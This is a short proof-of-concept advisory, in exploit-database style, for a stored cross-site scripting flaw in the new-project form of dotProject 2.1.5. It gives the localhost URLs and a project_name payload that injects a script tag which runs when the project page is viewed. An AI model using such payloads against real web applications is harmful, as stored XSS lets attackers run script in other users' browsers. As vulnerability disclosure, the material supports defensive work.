Kod:# exploit title: persistant xss in new project of dotproject2.1.5 # date: 21.o2.2o11 # author: lemlajt # software : dotproject # version: 2.1.5 # tested on: linux # cve : # PoC : 1. visit http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=addedit (adding new project) 2. POST $project_name="><script>persistant.here</script> and choose 'company' to submit the form. 3. to see some affects just visit new project page: (in this example) http://localhost/www/cmsadmins/dotpro/dotproject/index.php?m=projects&a=view&project_id=2 # *